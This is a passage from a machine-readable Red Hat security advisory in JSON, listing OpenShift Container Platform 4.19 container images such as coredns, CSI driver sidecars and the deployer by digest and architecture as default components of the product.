"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
